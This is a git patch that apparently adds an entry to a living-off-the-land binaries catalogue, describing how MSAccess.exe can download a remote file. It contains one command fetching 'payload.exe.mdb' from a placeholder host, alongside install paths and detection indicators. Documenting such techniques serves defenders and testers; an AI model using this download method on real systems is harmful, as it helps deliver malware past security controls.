From 3c826ab1caaf20b913f34f708ca5cee8530103cd Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Sat, 6 Apr 2024 01:18:57 +0700
Subject: [PATCH] Add MSAccess as a new downloader (#288)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
---
 yml/OtherMSBinaries/Msaccess.yml | 36 ++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 yml/OtherMSBinaries/Msaccess.yml

diff --git a/yml/OtherMSBinaries/Msaccess.yml b/yml/OtherMSBinaries/Msaccess.yml
new file mode 100644
index 0000000..618cbdb
--- /dev/null
+++ b/yml/OtherMSBinaries/Msaccess.yml
@@ -0,0 +1,36 @@
+---
+Name: MSAccess.exe
+Description: Microsoft Office component
+Author: Nir Chako
+Created: 2023-04-30
+Commands:
+  - Command: MSAccess.exe https://example.com/payload.exe.mdb
+    Description: Downloads payload from remote server
+    Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows
+    Tags:
+      - Download: INetCache
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSAccess.exe
+  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSAccess.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSAccess.exe
+  - Path: C:\Program Files\Microsoft Office\Office16\MSAccess.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSAccess.exe
+  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSAccess.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSAccess.exe
+  - Path: C:\Program Files\Microsoft Office\Office15\MSAccess.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSAccess.exe
+  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSAccess.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSAccess.exe
+  - Path: C:\Program Files\Microsoft Office\Office14\MSAccess.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSAccess.exe
+  - Path: C:\Program Files\Microsoft Office\Office12\MSAccess.exe
+Detection:
+  - IOC: URL on a MSAccess command line
+  - IOC: MSAccess making unexpected network connections or DNS requests
+Acknowledgement:
+  - Person: Nir Chako
+    Handle: '@C_h4ck_0'